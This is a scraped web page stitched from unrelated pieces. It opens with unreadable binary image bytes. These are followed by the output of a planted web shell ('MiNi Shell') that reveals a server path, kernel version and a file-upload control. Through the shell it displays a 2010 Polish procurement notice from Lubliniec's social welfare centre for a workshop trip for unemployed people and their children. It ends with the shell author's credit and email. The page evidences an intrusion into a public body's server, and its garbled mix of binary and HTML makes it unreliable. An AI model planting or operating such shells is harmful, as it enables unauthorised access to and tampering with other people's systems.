JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100816/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100816/251516-N-2010.html

<p class="kh_header"><b>Lubliniec: Zorganizowanie i przeprowadzenie dwudniowych warsztatów wyjazdowych dla uczestników projektu - osób bezrobotnych,  aktywizowanych społecznie i zawodowo w ramach realizowanego projektu systemowego  w Programie Operacyjnym Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 251516 - 2010; data zamieszczenia: 16.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Lublińcu , ul. Oświęcimska 30, 42-700 Lubliniec, woj. śląskie, tel. 34 3562005, faks 34 3513378.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie dwudniowych warsztatów wyjazdowych dla uczestników projektu - osób bezrobotnych,  aktywizowanych społecznie i zawodowo w ramach realizowanego projektu systemowego  w Programie Operacyjnym Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie dwudniowych Warsztatów wyjazdowych dla uczestników projektu - osób bezrobotnych, aktywizowanych społecznie i zawodowo w ramach realizowanego projektu systemowego w Programie Operacyjnych Kapitał Ludzki.

ORGANIZACJA I PRZEPROWADZENIE SZKOLENIA WYJAZDOWEGO:
1. Adresaci: 
Łączna liczba uczestników - 46 osób, w tym:
Osoby dorosłe (uczestnicy projektu) - 21
Dzieci w przedziale wiekowym 1,5 - 3 lat -  3 osoby,
Dzieci w przedziale wiekowym 4 - 5 lat -  2 osoby,
Dzieci w przedziale wiekowym 6- 8 lat - 10 osób,
Dzieci w przedziale wiekowym 9 - 14 lat - 10 osób
2. Miejsce i termin:
Termin: wrzesień lub I dekada października
Termin wyznaczy Zamawiający ,najpóźniej 3 dni przed podpisaniem umowy
Czas trwania 2 dni : rozpoczęcie :
I dzień 8.00 wyjazd autokarem z parkingu przy  rondzie  Opolczyka , ul. Częstochowska, Lubliniec do miejsca zakwaterowania
II dzień - powrót  z miejsca zakwaterowania  do Lublińca na parking jw. Powrót nastąpi do godz. 21 
Miejsce: Hotel 3 gwiazdkowy w miejscu atrakcyjnym turystycznie, w odległości do 150 km od Lublińca
3. Zakres usługi;
3.1 Transport
Zapewniony dla wszystkich uczestników. Autokar klimatyzowany musi spełniać wymagania określone w przepisach prawa zawartych w ustawie z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym ( tekst jednolity Dz.U. z 2005 r. Nr 108, poz.908) oraz odpowiadać warunkom technicznym określonym w rozporządzeniu Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia ( Dz. U. z 2003r. Nr 32, poz.262). W przypadku wystąpienia awarii autokaru uniemożliwiającej jego dalszą jazdę oraz szybką i niezwłoczną naprawę wykonawca zobowiązuje się do podstawienia na koszt własny innego autokaru w czasie nieprzekraczającym 2 godzin od wystąpienia awarii, który gwarantuje dojazd do bazy szkoleniowej.
W przypadku awarii obsługa jest zobowiązana do natychmiastowego powiadomienia o awarii przedstawiciela Zamawiającego . Zamawiający nie ponosi żadnych dodatkowych kosztów wynikających z awarii autokaru. Transport winien być dostosowany do ilości uczestników.
3.2 Ubezpieczenie
Wykonawca zobowiązany jest do ubezpieczenia łącznie 46 osób uczestniczących w wyjeździe od następstw nieszczęśliwych wypadków powstałych w trakcie szkolenia wyjazdowego, do ubezpieczenia na czas przejazdu i pobytu w hotelu tj. w szczególności kosztów leczenia, NNW, bagażu podróżnego. Minimalna suma ubezpieczenia ( na jednego uczestnika) wynosi 10000,00 zł. Kopia polisy potwierdzona za zgodność z oryginałem przez osobę uprawnioną winna być dostarczona Zamawiającemu najpóźniej na 1 dzień przed planowanym wyjazdem. Zamawiający przekaże Wykonawcy imienną listę uczestników szkolenia najpóźniej na 3 dni przed wyjazdem.
3.3 Zakwaterowanie
1 nocleg w hotelu 3 gwiazdkowym , pokoje z łazienkami i WC: 
2 osobowe -ilość :2                                                                                                     3 osobowe - 11
4 osobowe - 1
5 osobowe - 1,
z zapleczem szkoleniowym, salami o charakterze integracyjnym dostosowanym do ilości uczestników. Sale dydaktyczne winny zapewniać komfort uczestnictwa w zajęciach. Pomieszczenia powinny być przystosowane pod względem sanitarnym, przeciwpożarowym i bhp do prowadzenia szkoleń. Winny być wyposażone w odpowiednią liczbę miejsc siedzących i stolików. Wykonawca odpowiedzialny jest za zapewnienie urządzeń w ilości i stanie technicznym  zapewniającym odpowiedni poziom szkolenia tj.
- aparaturę audiowizualną
- rzutnik,
- tablica flipchart.
Pomieszczenia do przeprowadzenia zajęć winny być  oznakowane zgodnie z wytycznymi dostępnymi na stronie internetowej http: efs.silesia-region.pl zakładka Promocja
3.4 Wyżywienie
Z uwagi na udział dzieci, Wykonawca winien zwrócić szczególną uwagę na dostosowanie menu do zasad racjonalnego żywienia dostosowanego do wieku dzieci biorących udział w wyjeździe.
Uczestnicy powinni mieć zagwarantowane pełnowartościowe posiłki przez cały okres pobytu według następującego rozkładu:
I dzień
- obiad (I danie( zupa ) i II danie uwzględniające porcje mięsa lub ryby - 100 g, surówki, jarzyny - 100 g, deser i napój)
- kolacja 
II dzień
- śniadanie ( w postaci stołu szwedzkiego, w ofercie między innymi :  różnorodne pieczywo, nabiał, zupa mleczna i mleko  z płatkami kukurydzianymi lub zbożowymi dla młodszych dzieci, danie ciepłe, wędliny, (miód, dżem, masło naturalne i roślinne traktowane jako obowiązkowe dodatki do śniadań i kolacji nie stanowiące podstawowych składników posiłków)  porcje owoców, herbata, kawa, mleko do kawy, cytryna do herbaty, cukier itp.)
- obiad ( I ( zupa ) i II danie uwzględniające porcje mięsa lub ryby - 100 g, surówki, jarzyny - 100 g, deser i napój)
- kolacja.
W trakcie pobytu:
 całodobowy serwis napojów typu: woda mineralna gazowana i niegazowana, 
2 podwieczorki dla dzieci ( owoce, soki owocowe, bułka słodka lub pączek lub ciastko)
Serwis kawowy dla uczestników szkolenia w trakcie warsztatów ( kawa, herbata, woda gazowana i niegazowana, ciastka, cytryna do herbaty, mleko do kawy, cukier).
Do serwowania posiłków Wykonawca będzie stosował zastawę stołową w postaci sztućców ze stali nierdzewnej, nakryć stołowych z porcelany lub porcelitu.
Każdy z posiłków musi zawierać 2500 - 3200 kcal. Temperatura posiłków zgodna z normami żywieniowymi. Produkty spożywcze użyte do przygotowania posiłków winny posiadać co najmniej 6 miesięczny okres przydatności do spożycia licząc od daty wydania.
3.5 Program dydaktyczny- 10 godzin lekcyjnych  warsztatów ( po 45 min) dla 21 dorosłych uczestników w podziale na dwie grupy
Zakres:
a)  Podstawowe kompetencje i umiejętności społeczne : 
- wychodzenie z błędnego koła wyuczonej bezradności i sposoby obrony przed nią
- techniki relaksacyjne,
- asertywność,
b)  Zarządzanie budżetem i planowanie czasu osób bezrobotnych z ograniczonymi zasobami finansowymi
- pojęcie budżetu i jego zastosowanie
- przepływ gotówki a cele finansowe
- metody tworzenia budżetu i jego przystosowanie do skali gospodarstwa domowego
- kontrola wydatków
- jak rozsądnie wydawać pieniądze
- sposoby i możliwości oszczędzania
 - zasady racjonalnego pożyczania
- tworzenie planu finansowego
- efektywne wykorzystanie czasu,
- podstawowe techniki planowania w zakresie planu dnia i podziału obowiązków
Wykonawca zapewni każdemu uczestnikowi na własność:
- materiały dydaktyczne  (zawierające treści związane z wykładami) dla uczestników
-materiały piśmiennicze (przeznaczone na notatki i długopis) dla uczestników 
Wykonawca przekaże po 1 egzemplarzu  materiałów dla Zamawiającego
Wykonawca zapewni po dwóch trenerów (jednocześnie) dla każdej z dwóch grup uczestników. Trenerzy legitymować się winni wykształceniem wyższym psychologicznym lub pedagogicznym oraz minimum 2 -letnim doświadczeniem w prowadzeniu przedmiotowych zajęć.
Wykonawca zapewni:
- stosowne ologowanie materiałów zgodnie z wytycznymi zamieszczonymi na stronie internetowej http: efs.silesia-region.pl zakładka promocja oraz informacją o współfinansowaniu warsztatów realizowanych w ramach projektu Stawiam na siebie - efektywna integracja społeczno - zawodowa wobec wyzwań rynku pracy w Gminie Lubliniec ze środków Europejskiego Funduszu Społecznego
- listy obecności  stosownie ologowane jw.
- prowadzenie dziennika zajęć zawierającego tytuł szkolenia, stosowne ologowanie, listę uczestników, konspekty zajęć
-ologowane listy potwierdzające zakwaterowanie,  wyżywienie, odbiór materiałów zawierające nazwisko i imię uczestnika oraz jego podpis,  listy potwierdzające odbiór zaświadczeń o ukończeniu warsztatów,
- przygotowanie zaświadczeń o ukończeniu warsztatów
- przygotowanie narzędzi do ewaluacji uczestników warsztatów, w postaci badań ankietowych przeprowadzonych przed i po zakończeniu zajęć, oceniających poziom osiągniętych rezultatów z prowadzonych zajęć.
- przygotowanie raportu z badania ewaluacyjnego
- przekazanie wszystkich wyżej wymienionych materiałów Zamawiającemu w terminie do 7 dni po zakończeniu zajęć wraz z kopiami wydanych zaświadczeń
Wszystkie materiały winny być logowane zgodnie z wytycznymi znajdującymi się na stronie internetowej http: efs.silesia-region.pl zakładka promocja oraz informacją o współfinansowaniu warsztatów realizowanych w ramach projektu Stawiam na siebie - efektywna integracja społeczno - zawodowa wobec wyzwań rynku pracy w Gminie Lubliniec ze środków Europejskiego Funduszu Społecznego
3.6 Program zajęć opiekuńczych dla dzieci 
Wykonawca zapewni :
- organizację zajęć dostosowanych do wieku uczestników,
- opiekunów dla  dzieci, z zachowaniem zasady:  trójka najmłodszych dzieci ( 1,5, 2 , 3 lata) - 2 opiekunów,
- materiały do zajęć dla każdego dziecka oraz paczki ze słodyczami i zabawkami ( stosownie do wieku np. maskotka, klocki, książki, puzzle, zabawki edukacyjne)
3.7 Program rekreacyjny dla wszystkich uczestników 
Program przewidujący zorganizowanie między innymi zwiedzania atrakcji turystycznych w pobliżu miejsca zakwaterowania  lub alternatywnie  inne atrakcje turystyczno - rekreacyjne  na wypadek niepogody 
Ponadto Wykonawca zapewni:
-zgłoszenie warsztatów do bazy danych WWW.inwestycjawkadry.pl
- archiwizację dokumentacji związanej z przeprowadzeniem warsztatów do 2020 r.
- udostępnienie dokumentacji jednostkom kontrolnym w tym Zamawiającemu w okresie do 2020 r.
- poddanie się kontroli Zamawiającego na każdym etapie realizacji warsztatów,
- udokumentowanie warsztatów na płycie CD ( co najmniej 10 zdjęć) i przekazania dokumentacji Zamawiającemu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oswiadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych.
Ocena spełnienia warunków nastąpi na podstawie podpisanego załączonego oświadczenia do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oswiadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych.
Ocena spełnienia warunków nastąpi na podstawie podpisanego załączonego oświadczenia do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oswiadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych.
Ocena spełnienia warunków nastąpi na podstawie podpisanego załączonego oświadczenia do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki dotyczące:
1.1 posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
1.2. posiadania wiedzy i doświadczenia; 	
1.3. dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; 
1.4. znajdowania się  w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Ocena spełnienia warunków nastąpi na podstawie podpisanego załączonego oświadczenia do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oswiadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych.
Ocena spełnienia warunków nastąpi na podstawie podpisanego załączonego oświadczenia do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo - wymagane w przypadku gdy do reprezentowania Wykonawcy upoważniona jest osoba inna niż wskazane w aktualnym odpisie z właściwego rejestru.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie w realizacji  warsztatów wyjazdowych - 50</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lubliniec.bip.info.pl/index.php?idmp=99&r=r<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej
ul. Oświęcimska 30
42-700 Lubliniec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.08.2010 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej
ul. Oświęcimska 30
42-700 Lubliniec
Pokój nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Stawiam na siebie - efektywna integracja społeczno - zawodowa, wobec wyzwań rynku pracy w Gminie Lubliniec współfinansowany przez Unię Europejską z ropejskiego Funduszu Społecznego w ramach Priorytetu VII, Działania 7.1, Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com